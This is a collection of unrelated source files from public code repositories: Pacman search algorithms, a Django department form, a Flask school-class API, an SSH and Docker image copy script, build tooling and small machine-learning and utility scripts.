#Markel\n #Creamos una clase Nodo que contenga los siguientes datos\n # coordenada: la coordenada del propio nodo\n # camino: el camino que debe realizar el pacman para llegar a él\n class Nodo:\n def __init__(self , coordenada, camino=[], coste=0):\n self.coordenada = coordenada\n self.camino = camino\n self.coste = coste\n \n coordenadaInicial = problem.getStartState()\n nodoInicial = Nodo(coordenada= coordenadaInicial)\n sinExplorar = util.PriorityQueue()\n sinExplorar.update(nodoInicial, nodoInicial.coste)\n explorados = set() \n\n while not sinExplorar.isEmpty(): \n nodoActual = sinExplorar.pop()\n if nodoActual.coordenada not in explorados:\n explorados.add(nodoActual.coordenada)\n if problem.isGoalState(nodoActual.coordenada):\n return nodoActual.camino\n\n vecinos = problem.getSuccessors( 
nodoActual.coordenada )\n for coordVecino,caminoVecino,costeVecino in vecinos:\n nodoNuevo = Nodo(coordenada = coordVecino, camino = nodoActual.camino + [caminoVecino], coste= nodoActual.coste + costeVecino)\n sinExplorar.update(nodoNuevo, nodoNuevo.coste)\n \n #finalmente devolvemos el camino que tiene el ultimo nodo analizado\n return [] \n\n\n\n \"\"\"Search the node of least total cost first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n util.raiseNotDefined()\n\ndef nullHeuristic(state, problem=None):\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided SearchProblem. This heuristic is trivial.\n \"\"\"\n return 0\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n #Markel\n #Creamos una clase Nodo que contenga los siguientes datos\n # coordenada: la coordenada del propio nodo\n # camino: el camino que debe realizar el pacman para llegar a él\n class Nodo:\n def __init__(self , coordenada, camino=[], coste=0):\n self.coordenada = coordenada\n self.camino = camino\n self.coste = coste\n \n #Creamos el nodo inicial\n coordenadaInicial = problem.getStartState()\n nodoInicial = Nodo(coordenada= coordenadaInicial)\n\n #Lo insertamos en sinExplorar con su coste=0\n sinExplorar = util.PriorityQueue()\n sinExplorar.push(nodoInicial, nodoInicial.coste)\n explorados = set() \n\n while not sinExplorar.isEmpty(): \n nodoActual = sinExplorar.pop()\n if nodoActual.coordenada not in explorados:\n explorados.add(nodoActual.coordenada)\n if problem.isGoalState(nodoActual.coordenada):\n return nodoActual.camino\n \n vecinos = problem.getSuccessors( nodoActual.coordenada )\n for coordVecino,caminoVecino,costeVecino in vecinos:\n #Camino = el camino que hay que recorrer para llegar a ese nodo\n #Coste = el coste que tiene llegar al nodo + el heuristico\n caminoNuevo = nodoActual.camino + [caminoVecino]\n nodoNuevo = Nodo(coordenada = coordVecino, \n camino = caminoNuevo, \n coste = problem.getCostOfActions(caminoNuevo) + heuristic(coordVecino,problem))\n \n sinExplorar.push(nodoNuevo, nodoNuevo.coste)\n \n #finalmente devolvemos el camino que tiene el ultimo nodo analizado\n return nodoActual.camino\n \n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n util.raiseNotDefined()\n\n\n# Abbreviations\nbfs = breadthFirstSearch\ndfs = depthFirstSearch\nastar = aStarSearch\nucs = uniformCostSearch\n","repo_name":"jonblanco/Tecnicas-de-Inteligencia-Artificial","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":11293,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42564013814","text":"from apples import Apple\nimport unittest\n\ntest_apple = Apple()\n\nclass MinTest(unittest.TestCase):\n def test_apple(self):\n self.assertEqual(test_apple.get_apple(), \"eggf\", 'Ejnye')\n\nif __name__ == '__main__':\n unittest.main() \n ","repo_name":"green-fox-academy/DonBattery","sub_path":"week-04/day-3/apples_test.py","file_name":"apples_test.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23572678370","text":"import click\nimport omegaconf\nimport torch\nfrom torch import nn\nfrom torchvision.transforms import ToPILImage\n\nfrom model.diffusion import GaussianDiffusion\nfrom model.unet import DiffusionModel\nfrom torchvision.utils import make_grid\n\nfrom utils.config import 
get_class_from_str\n\n\n@click.command()\n@click.option(\"--config-path\", \"-c\", type=str)\n@click.option(\"--device\", \"-d\", type=str, default=\"cuda\")\n@click.option(\"--batch-size\", \"-b\", type=int, default=1)\n@click.option(\"--checkpoint-path\", \"-p\", type=str)\ndef sample(config_path, checkpoint_path, batch_size=1, device=\"cuda\"):\n config = omegaconf.OmegaConf.load(config_path)\n\n model = get_class_from_str(config.model.target)(**config.model.params).to(device)\n diffusion = get_class_from_str(config.diffusion.target)(\n model, **config.diffusion.params\n ).to(device)\n print(f\"Resuming from {checkpoint_path}\")\n checkpoint = torch.load(checkpoint_path)\n diffusion.load_state_dict(checkpoint[\"model_state_dict\"], strict=False)\n\n model.eval()\n # classes = torch.randint(0, 10, [batch_size]).to(device)\n classes = torch.tensor([1, 7, 1, 2, 1, 9, 8, 6]).to(device)\n print(classes)\n upsample = nn.Upsample(size=(model.size[0] * 3, model.size[1] * 3), mode=\"bilinear\")\n\n for _ in range(2):\n result = diffusion.p_sample_loop(\n (batch_size, model.in_channel, *model.size), classes\n )\n ToPILImage()(make_grid(upsample(result.cpu()))).show()\n\n\nif __name__ == \"__main__\":\n sample()\n","repo_name":"luc-leonard/pytorch-diffusion-autoencoder","sub_path":"scripts/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"30614444625","text":"# QUESTION URL: https://www.hackerrank.com/challenges/merge-the-tools/problem\n# STATUS: Wrong Answer\n\ndef merge_the_tools(string, k):\n # your code goes here\n items_len = len(string)//k\n start = 0\n for _ in range(items_len):\n counted = \"\"\n value = string[start:items_len+start]\n for i in value:\n if i not in counted:\n print(i, end=\"\")\n counted += i\n print()\n start += items_len\n\n","repo_name":"Yash2003Bisht/ProblemSolutions","sub_path":"solutions/hackerrank/Merge_the_Tools_/Merge_the_Tools__9.py","file_name":"Merge_the_Tools__9.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31189424057","text":"import sqlite3\nfrom django.shortcuts import render, reverse, redirect\n# from django.contrib.auth.decorators import login_required\nfrom hrapp.models import Department\nfrom ..connection import Connection\n\n\ndef get_departments():\n with sqlite3.connect(Connection.db_path) as conn:\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select\n dep.id,\n dep.name,\n dep.budget\n from hrapp_department dep\n \"\"\")\n\n return db_cursor.fetchall()\n\n# @login_required\ndef department_form(request):\n if request.method == 'GET':\n departments = get_departments()\n template = 'departments/form.html'\n context = {\n 'all_departments': departments\n }\n return render(request, template, context)\n\n elif request.method == 'POST':\n form_data = request.POST\n\n with sqlite3.connect(Connection.db_path) as conn:\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n INSERT INTO hrapp_department\n (\n name, budget\n )\n VALUES (?, ?)\n \"\"\",\n (form_data['name'], form_data['budget'])\n )\n\n return 
redirect(reverse('hrapp:departments'))","repo_name":"nss-day-cohort-33/bangazon-workforce-management-kingdom-of-glyweth","sub_path":"hrapp/views/departments/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9123308261","text":"import sys\nimport argparse\nfrom yaml import load\n\nfrom resources.libraries.python.ssh import SSH\n\n\ndef ssh_no_error(ssh, cmd, sudo=False):\n \"\"\"Execute a command over ssh channel, and log and exit if the command\n fails.\n\n :param ssh: SSH() object connected to a node.\n :param cmd: Command line to execute on remote node.\n :param sudo: Run command with sudo privileges.\n :type ssh: SSH() object\n :type cmd: str\n :type sudo: bool\n :returns: stdout from the SSH command.\n :rtype: str\n :raises RuntimeError: In case of unexpected ssh command failure\n \"\"\"\n if sudo:\n ret, stdo, stde = ssh.exec_command_sudo(cmd, timeout=60)\n else:\n ret, stdo, stde = ssh.exec_command(cmd, timeout=60)\n\n if ret != 0:\n print('Command execution failed: \"{}\"'.format(cmd))\n print('stdout: {0}'.format(stdo))\n print('stderr: {0}'.format(stde))\n raise RuntimeError('Unexpected ssh command failure')\n\n return stdo\n\n\ndef ssh_ignore_error(ssh, cmd, sudo=False):\n \"\"\"Execute a command over ssh channel, ignore errors.\n\n :param ssh: SSH() object connected to a node.\n :param cmd: Command line to execute on remote node.\n :param sudo: Run command with sudo privileges.\n :type ssh: SSH() object\n :type cmd: str\n :type sudo: bool\n :returns: stdout from the SSH command.\n :rtype: str\n \"\"\"\n if sudo:\n ret, stdo, stde = ssh.exec_command_sudo(cmd)\n else:\n ret, stdo, stde = ssh.exec_command(cmd)\n\n if ret != 0:\n print('Command execution failed: \"{}\"'.format(cmd))\n print('stdout: {0}'.format(stdo))\n print('stderr: {0}'.format(stde))\n\n return stdo\n\n\ndef main():\n \"\"\"Copy and load of Docker image.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--topo\", required=True,\n help=\"Topology file\")\n parser.add_argument(\"-d\", \"--directory\", required=True,\n help=\"Destination directory\")\n parser.add_argument(\"-i\", \"--images\", required=False, nargs='+',\n help=\"Images paths to copy\")\n parser.add_argument(\"-c\", \"--cancel\", help=\"Cancel all\",\n action=\"store_true\")\n\n args = parser.parse_args()\n topology_file = args.topo\n images = args.images\n directory = args.directory\n cancel_all = args.cancel\n\n work_file = open(topology_file)\n topology = load(work_file.read())['nodes']\n\n ssh = SSH()\n for node in topology:\n if topology[node]['type'] == \"DUT\":\n print(\"###TI host: {host}\".format(host=topology[node]['host']))\n ssh.connect(topology[node])\n\n if cancel_all:\n # Remove destination directory on DUT\n cmd = \"rm -r {directory}\".format(directory=directory)\n stdout = ssh_ignore_error(ssh, cmd)\n print(\"###TI {stdout}\".format(stdout=stdout))\n\n else:\n # Create installation directory on DUT\n cmd = \"rm -r {directory}; mkdir {directory}\"\\\n .format(directory=directory)\n stdout = ssh_no_error(ssh, cmd)\n print(\"###TI {stdout}\".format(stdout=stdout))\n\n # Copy images from local path to destination dir\n for image in images:\n print(\"###TI scp: {}\".format(image))\n ssh.scp(local_path=image, remote_path=directory)\n\n # Load image to Docker.\n cmd = \"for f in {directory}/*.tar.gz; do \"\\\n \"sudo docker load -i $f; done\".format(directory=directory)\n stdout = 
ssh_no_error(ssh, cmd)\n print(\"###TI {}\".format(stdout))\n\n # Remove images from Docker.\n cmd = \"docker rmi $(sudo docker images -f 'dangling=true' -q)\"\n stdout = ssh_ignore_error(ssh, cmd, sudo=True)\n print(\"###TI {}\".format(stdout))\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"preym17/csit","sub_path":"resources/tools/scripts/topo_container_copy.py","file_name":"topo_container_copy.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18455485847","text":"import json\nimport logging\nfrom collections import namedtuple\nfrom typing import List\n\nimport requests\nfrom injector import Injector\n\nfrom Fly.models.avia_subscription import AviaSubscription\nfrom configuration import Configuration\n\n\nclass AviaSubscriptionService:\n def __init__(self):\n injector = Injector()\n configuration = injector.get(Configuration)\n\n self.secret_key = configuration.config['DEFAULT']['SECRET']\n self.api_url = configuration.config['DEFAULT']['URL']\n self.url_get_avia = self.api_url + \"/api/v1/avia-subscriptions\"\n\n def get_actual_subscriptions(self) -> List[AviaSubscription]:\n headers = {'Content-type': 'application/json', # Определение типа данных\n 'Content-Encoding': 'utf-8',\n 'Authorization': 'Token %s' % self.secret_key}\n\n answer = requests.get(self.url_get_avia, headers=headers)\n result = json.loads(answer.text, object_hook=lambda d: namedtuple('AviaSubscription', d.keys())(*d.values()))\n\n if answer.status_code != 200:\n logging.error(answer.text)\n\n return result\n\n @staticmethod\n def get_unic_subcription(subsriptions: List[AviaSubscription]) -> List[AviaSubscription]:\n result = []\n for item in subsriptions:\n if any(x for x in result if (x.flight_number == item.flight_number) and\n (x.flight_departure == item.flight_departure)):\n continue\n else:\n result.append(item)\n\n return result\n\n @staticmethod\n def get_subscraption_by_flight_number(subsriptions: List[AviaSubscription],\n flight_number, flight_departure) -> List[AviaSubscription]:\n result = []\n for item in subsriptions:\n if ((item.flight_number == flight_number)\n and (item.flight_departure == flight_departure)):\n result.append(item)\n\n return result\n","repo_name":"CoderGosha/WT_Flightstats","sub_path":"Fly/services/avia_subscription_service.py","file_name":"avia_subscription_service.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34898713552","text":"## Calculate the length of a iterable object\ndef calc_len(x):\n length = 0\n for i in x:\n length += 1\n return length\n\n\n## print(calc_len([14, 19, 7, 13, 19, 6, 4, 19, 16, 19]))\n\n\n## Create a set from a object\ndef make_set(y):\n good_set = []\n for n in y:\n if n not in good_set:\n good_set.append(n)\n return good_set\n\n\n## print(make_set([24, 61, 4, 35, 32, 83, 38, 33, 40, 24]))\n## print(len(make_set([24, 61, 4, 35, 32, 83, 38, 33, 40, 24])))\n\n## Create a range function with start, stop, and step\n\n\ndef custom_range(stop, start=0, step=1):\n range_list = [start]\n while start + step < stop:\n start += step\n range_list.append(start)\n return range_list\n\n\n##print(custom_range(6, 1, 
2))\n","repo_name":"itesser/CT_Coursework","sub_path":"Week_2/sample_mods.py","file_name":"sample_mods.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41895624048","text":"import torch\nimport torchaudio\nfrom Generator import Generator as gen\n\nsong_lenght = 30 # in seconds\nsong_sample_rate = 44100\nmodel_path = \"models\\\\\"\nmodel_name = \"1rnn221v1.pt\"\nsave_path = \"saved\\\\\"\nsong_name = \"test1.wav\"\n\ndevice = torch.device('cuda')\n\ndef load_model_params(model_path, model):\n checkpoint = torch.load(model_path)\n model.load_state_dict(checkpoint[\"state_dictionary\"])\n return model\n\nmodel = gen(2, 2, 1).to(device)\nmodel = load_model_params(model_path + model_name, model)\nsong_step = torch.randn(1, 1, 2).to(device)\nsong_step, h_save = model.forward(song_step)\n\nfinal_song = []\nsample_lenght = song_lenght * song_sample_rate\nfor song_l in range(sample_lenght):\n\n song_step, h_save = model.running_forward(song_step, h_save)\n final_song.append(song_step)\n print(f\"{(round(song_l/sample_lenght, 1))*100}% \", end=\"\\r\")\n\nfinal_song = torch.cat(final_song).squeeze(1).permute(1, 0).cpu().detach()\n\nprint(final_song.shape)\ntorchaudio.save(save_path+song_name, final_song, song_sample_rate)\n\n","repo_name":"BoykoDenis/dubstep_gen_gan","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10321819072","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# 距離認識デモ\n# for Bezelie Flitz\n# for Raspberry Pi\n\nfrom random import randint # 乱数の発生\nfrom time import sleep # ウェイト処理\nimport subprocess # 外部プロセスを実行するモジュール\nimport json # jsonファイルを扱うモジュール\nimport csv # CSVファイルを扱うモジュール\nimport sys # python終了sys.exit()のために必要\nimport bezelie # べゼリー専用サーボ制御モジュール\nimport RPi.GPIO as GPIO\nimport time\n\n# 定義\npinSwitch = 4\n#csvFile = \"data_rangeDialogE.csv\" # セリフリスト\ncsvFile = \"data_rangeDialogJ.csv\" # セリフリスト\nttsJpn = \"exec_talkJpn.sh\" # 音声合成実行ファイル\nttsEng = \"exec_talkEng.sh\" # 英語発話シェルスクリプトのファイル名\n\n# 初期設定\n#bezelie.moveCenter()\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(pinSwitch, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\n# 関数\ndef replyMessage(keyWord): # 対話\n data = [] # 対話ファイル(csv)を変数dataに読み込む\n with open(csvFile, 'rt') as f: # csvFileをtextでオープン\n for i in csv.reader(f): # ファイルから1行ずつiに読み込む\n data.append(i) # dataに追加\n\n data1 = [] # dataから質問内容がキーワードに一致している行をdata1として抜き出す\n for index,i in enumerate(data): # index=連番\n if i[0]==keyWord: #\n print (\"見つかった\")\n j = randint(1,100) # 1から100までの乱数を発生させる\n data1.append(i+[j]+[index]) # data1=質問内容,返答,乱数,連番のリスト\n\n if data1 == []: # data1が空っぽだったらランダムで返す\n print (\"ランダム\")\n for index,i in enumerate(data): \n j = randint(1,100) \n data1.append(i+[j]+[index])\n\n maxNum = 0 # data1の候補から乱数値が最大なものを選ぶ\n for i in data1: \n if i[2] > maxNum: \n maxNum = i[2] \n ansNum = i[3] \n\n bez.moveRnd()\n # subprocess.call(\"sh \"+ttsEng+\" \"+data[ansNum][1], shell=True)\n subprocess.call(\"sh \"+ttsJpn+\" \"+data[ansNum][1], shell=True)\n bez.stop()\n\n# サーボの初期化\nbez = bezelie.Control() # べゼリー操作インスタンスの生成\nbez.moveCenter() # サーボの回転位置をトリム値に合わせる\n\n# 初回処理\n#subprocess.call(\"sh \"+ttsEng+\" \"+u\"preparation-has-been-completed\", shell=True)\nsubprocess.call(\"sh \"+ttsJpn+\" 準備完了\", shell=True)\n\n# メインループ\ndef main():\n try:\n while True: # infinity loop\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(pinSwitch, 
GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n if GPIO.input(pinSwitch)==GPIO.LOW:\n print (\"近いです\")\n else:\n replyMessage(u\"顔発見\")\n sleep (0.5)\n\n except KeyboardInterrupt: # CTRL+Cで終了\n bez.moveCenter()\n sleep (0.2)\n bez.stop()\n sleep (0.1)\n GPIO.cleanup()\n sys.exit(0)\n\nif __name__ == \"__main__\":\n main()\n GPIO.cleanup()\n sys.exit(0)\n","repo_name":"bezelie/flitz","sub_path":"demo_switch1.py","file_name":"demo_switch1.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"43328745842","text":"import sys, os\nbasePath = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(basePath)\n\nfrom np.lib import metric\nfrom np.lib import variable_store as VS\nfrom np import util\nimport pydot\n \n\ndef getName(varClass, nameType):\n\n nameFunctions = {\n 'id': VS.getClassnameForId,\n 'alias': VS.getAlias,\n 'option': VS.getOption,\n 'class': VS.getClassname\n }\n\n\n nameAndUnits = nameType.split(\".\")\n name = nameAndUnits[0]\n result = nameFunctions[name](varClass)\n if (len(nameAndUnits) > 1) and varClass.units:\n result = \"%s\\n(%s)\" % (result, varClass.units)\n return result\n\n\n\ndef buildPyDotGraph(variableGraph, nameType):\n \"\"\"\n build up Pydot graph of nodes (Variables) and edges (Variable Dependencies)\n \"\"\"\n graph = pydot.Dot(graph_type='digraph', rankdir='LR')\n\n # First add nodes\n for var in variableGraph:\n fill_color = \"#AA9999\"\n # fill based on whether var is a leaf (i.e. dependencies are empty)\n if len(var[1]) == 0:\n fill_color = \"#9999AA\"\n\n node_var = var[0]\n node = pydot.Node(getName(node_var, 'id'), style='filled', \n fillcolor=fill_color)\n node.set_label(getName(node_var, nameType))\n graph.add_node(node)\n\n # Now add edges\n for var_to in variableGraph:\n for var_from in var_to[1]:\n node_from = graph.get_node(getName(var_from, 'id'))# [0]\n node_to = graph.get_node(getName(var_to[0], 'id'))# [0]\n graph.add_edge(pydot.Edge(node_from, node_to))\n\n return graph\n\n\nif __name__ == '__main__':\n\n if (len(sys.argv) < 4):\n sys.stderr.write(\"example usage: python model_demand_dependencies.py model variable outfile [name_type]\\n\")\n sys.exit()\n\n # setup model\n model = sys.argv[1]\n variable = sys.argv[2] \n outfile = sys.argv[3]\n nameType = \"alias\"\n if len(sys.argv) == 5:\n nameType = sys.argv[4]\n\n mvModel = metric.getModel(model)\n modelVar = util.getSubModuleFromString(mvModel, variable)\n dependencies = VS.buildOrderedDependencies(modelVar)\n graph = buildPyDotGraph(dependencies, nameType)\n \n graph.write(outfile)\n \n\n \n","repo_name":"SEL-Columbia/networkplanner","sub_path":"utilities/model_var_dependencies.py","file_name":"model_var_dependencies.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"48"} +{"seq_id":"6688465519","text":"from aste.workers.msworkers import MSBuildWorker\nfrom aste.workers.mixins import TestRunnerMixin\nfrom shutil import make_archive\nfrom datetime import datetime\nimport os\n\n\nclass BoogieWorker(TestRunnerMixin, MSBuildWorker):\n \"\"\"Implements the steps necessary to build Boogie.\n \"\"\"\n\n def __init__(self, env):\n super(BoogieWorker, self).__init__(env, 'Boogie')\n\n def set_version_number(self):\n now = datetime.now()\n\n version = \"%s.%s.%s%s.%s\" % (self.cfg.VersionNumbers.Boogie.Major,\n self.cfg.VersionNumbers.Boogie.Minor,\n now.year - 
self.cfg.VersionNumbers.Boogie.YearZero,\n now.strftime('%m%d'),\n now.strftime('%H%M'))\n\n self.cd(self.cfg.Paths.Boogie + \"\\Build\")\n cmd = \"%s updateVersionFile.xml /p:CCNetLabel=%s\" % (\n self.cfg.Apps.MSBuild, version)\n\n self.runSafely(cmd)\n\n def copySpecSharpToBoogie(self):\n self.cd(self.cfg.Paths.Boogie + \"\\Binaries\")\n cmd = \"%s SPECSHARPROOT=%s\" % (self.cfg.Apps.nmake2010,\n self.cfg.Paths.SpecSharp)\n\n self.runSafely(cmd)\n\n def buildBoogie(self):\n self.cd(self.cfg.Paths.Boogie + \"\\Source\")\n cmd = \"%s Boogie.sln /Rebuild Checked\" % self.cfg.Apps.devenv2010\n self._runDefaultBuildStep(cmd)\n\n def buildDafny(self):\n self.cd(self.cfg.Paths.Boogie + \"\\Source\")\n cmd = \"%s Dafny.sln /Rebuild Checked\" % self.cfg.Apps.devenv2010\n self._runDefaultBuildStep(cmd)\n\n def testBoogie(self):\n failed = self.runTestFromAlltestsFile(\n self.cfg.Paths.Boogie + \"\\\\Test\\\\alltests.txt\", 'testBoogie',\n self.cfg.Flags.ShortTestsOnly)\n\n self.project_data['tests']['failed'] = failed\n\n def zip_binaries(self, filename):\n self.cd(self.cfg.Paths.Boogie + \"\\Binaries\")\n cmd = \"PrepareBoogieZip.bat\"\n self.runSafely(cmd)\n # make_archive expects an archive name without a filename extension.\n archive_name = os.path.splitext(os.path.abspath(filename))[0]\n root_dir = os.path.abspath(\"export\")\n make_archive(archive_name, 'zip', root_dir)\n","repo_name":"ggrov/tacny","sub_path":"boogie-partners/Aste/aste/workers/boogieworkers.py","file_name":"boogieworkers.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"11941766516","text":"from flask import Blueprint, request, abort, jsonify\n\nfrom . import admin_token_required, db\n\n@admin_token_required\ndef delete_students_from_class():\n if not request.is_json:\n abort(400, \"Expected json\")\n if (not \"class_id\" in request.json or\n type(request.json[\"class_id\"]) != int):\n abort(400, \"Expected class id as int\")\n database = db.get_db()\n cursor = database.cursor()\n cursor.execute('''\n DELETE FROM students\n WHERE class_id=%s\n ''', \n (request.json[\"class_id\"], )\n )\n database.commit()\n return jsonify({\n \"result\": \"OK\"\n }), 200\n\n\n@admin_token_required\ndef get_classes_short():\n cursor = db.get_db().cursor()\n cursor.execute('''\n SELECT id, class_name\n FROM classes ORDER BY id;\n '''\n )\n exec_result = cursor.fetchall()\n if exec_result is None:\n return None\n result = [{\n \"id\": data[0],\n \"name\": data[1],\n \"type\": \"ClassShort\"\n } for data in exec_result\n ]\n return jsonify(result), 200\n\n\n@admin_token_required\ndef get_class_full():\n print(request.json)\n if (\n not request.is_json or\n not \"id\" in request.json.keys() or\n type(request.json[\"id\"]) != int\n ):\n abort(400)\n\n cursor = db.get_db().cursor()\n cursor.execute(\n '''\n SELECT classes.id, classes.class_name, groups.id AS full_class_group_id\n FROM classes \n INNER JOIN groups ON groups.class_id=classes.id\n WHERE classes.id=%s AND groups.is_full_class_group=True\n ''',\n (request.json[\"id\"], )\n )\n class_exec_result = cursor.fetchone()\n\n if class_exec_result is None:\n abort(400)\n\n cursor.execute(\n '''\n SELECT id, username, full_name, email \n FROM students WHERE class_id=%s ORDER BY full_name\n ''',\n (request.json[\"id\"], )\n )\n students_exec_result = cursor.fetchall()\n\n return jsonify({\n \"type\": \"ClassFull\",\n \"id\": class_exec_result[0],\n \"name\": class_exec_result[1],\n 
\"full_class_group_id\": class_exec_result[2],\n \"students\": [\n {\n \"id\": student_data[0],\n \"username\": student_data[1],\n \"full_name\": student_data[2],\n \"email\": student_data[3],\n \"type\": \"StudentWithoutClass\"\n } for student_data in students_exec_result\n ]\n })\n\n@admin_token_required\ndef move_students_to_class():\n if (\n not request.is_json or\n not \"class_id_from\" in request.json.keys() or\n type(request.json[\"class_id_from\"]) != int or\n not \"class_id_to\" in request.json.keys() or\n type(request.json[\"class_id_to\"]) != int\n ):\n abort(400, \"Expected json with class_id_from and class_id_to as ints\")\n database = db.get_db()\n cursor = database.cursor()\n try:\n cursor.execute('''\n UPDATE students\n SET class_id=%s\n WHERE class_id=%s\n ''', (request.json[\"class_id_to\"], request.json[\"class_id_from\"]))\n cursor.execute('''\n UPDATE groups\n SET class_id=%s\n WHERE class_id=%s AND is_full_class_group=False\n ''', (request.json[\"class_id_to\"], request.json[\"class_id_from\"]))\n cursor.execute('''\n DELETE FROM teachers_groups AS tg\n WHERE tg.group_id=%s AND EXISTS(\n SELECT 1 FROM teachers_groups AS tcgr\n WHERE tcgr.group_id=%s AND\n tcgr.teacher_id=tg.teacher_id AND\n tcgr.subject_id=tg.subject_id\n )\n ''', (request.json[\"class_id_to\"], request.json[\"class_id_from\"]))\n cursor.execute('''\n UPDATE teachers_groups AS tg\n SET group_id=%s\n WHERE group_id=%s\n ''', (request.json[\"class_id_to\"], request.json[\"class_id_from\"]))\n except db.psycopg2.errors.lookup(db.psycopg2.errorcodes.FOREIGN_KEY_VIOLATION):\n abort(400, \"Class with class_id_to doesn't exist\")\n else:\n database.commit()\n return jsonify(result=\"ok\")\n\n@admin_token_required\ndef edit_class():\n if not (\n request.is_json and\n type(request.json.get('id')) is int and\n type(request.json.get('name')) is str and\n len(request.json.get('name')) in range(1, 256)\n ):\n abort(400, \"Invalid data\")\n\n database = db.get_db()\n cursor = database.cursor()\n cursor.execute('''\n UPDATE classes\n SET class_name=%s\n WHERE id=%s RETURNING True;\n ''', (\n request.json[\"name\"],\n request.json[\"id\"]\n ))\n if cursor.fetchone() is None:\n abort(400, 'Wrong class id')\n database.commit()\n return jsonify(result='ok')\n\n\n@admin_token_required\ndef create_class():\n if not (\n request.is_json and\n type(request.json.get(\"name\")) is str and\n len(request.json['name']) in range(1, 257) and\n type(request.json.get(\"students_ids\")) == list\n ): \n abort(400, \"Expected json with name and students_ids\")\n\n database = db.get_db()\n cursor = database.cursor()\n cursor.execute(r'''\n SELECT EXISTS(SELECT 1 FROM classes WHERE class_name=%s);\n ''', (request.json['name'], ))\n if cursor.fetchone()[0]:\n abort(400, 'Class with this name already exists')\n\n cursor.execute('''\n INSERT INTO classes (class_name)\n VALUES (%s) RETURNING id;\n ''', (request.json[\"name\"], ))\n class_id = cursor.fetchone()[0]\n cursor.execute('''\n INSERT INTO groups (group_name, class_id, is_full_class_group)\n VALUES ('Весь клас', %s, True); \n ''', (class_id, ))\n for id_ in request.json[\"students_ids\"]:\n db.edit_student(id_, {\"class_id\": class_id})\n \n database.commit()\n return jsonify({\"result\": \"ok\"}), 200\n\n\ndef delete_class():\n if not (\n request.is_json and\n type(request.json.get('id')) is int\n ):\n abort(400, 'Invalid data')\n\n database = db.get_db()\n cursor = database.cursor()\n cursor.execute(r'''\n DELETE FROM classes WHERE id=%s RETURNING 1;\n ''', (request.json['id'], 
));\n if cursor.fetchone() is None:\n abort(400, 'Wrong class id')\n\n database.commit()\n return jsonify(result='ok')","repo_name":"scriptium/rateyard","sub_path":"api/rateyard_api/admin/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"19678179767","text":"import pandas as pd\n\nfrom kmodes.kmodes import KModes\nfrom sklearn.manifold import TSNE\n\nimport matplotlib.pyplot as plt\n\n# Read in the data\naccident_df = pd.read_csv(\"data/accident.CSV\", encoding=\"windows-1252\")\n\ncase_id = \"ST_CASE\"\n\naccident_df.set_index(case_id, inplace=True)\n\naccident_useful_columns = {\n \"ROUTE\": \"Route Signing\",\n \"RUR_URB\": \"Land Use\",\n \"FUNC_SYS\": \"Functional System\",\n \"RD_OWNER\": \"Ownership\",\n \"HARM_EV\": \"Harmful Event\",\n \"MAN_COLL\": \"Manner of Collision\",\n \"RELJCT2\": \"Relation to Junction\",\n \"TYP_INT\": \"Intersection Type\",\n \"REL_ROAD\": \"Relation to Trafficway\",\n \"WRK_ZONE\": \"Work Zone\",\n \"LGT_COND\": \"Light Condition\",\n \"WEATHER\": \"Weather\",\n \"SCH_BUS\": \"School Bus\"\n}\n\n# Filter out the columns we don't need\naccident_df = accident_df.filter(items=accident_useful_columns.keys())\n\n# Create numpy matrix\naccident_mat = accident_df.to_numpy()\n\n# k-modes clustering\nbest_cost = float(\"inf\")\nbest_clusters = []\nbest_km = None\nfor n_clusters in range(2, 10):\n km = KModes(n_clusters=n_clusters, init=\"Huang\", n_jobs=16, verbose=1)\n clusters = km.fit_predict(accident_mat)\n if km.cost_ < best_cost:\n best_cost = km.cost_\n best_clusters = 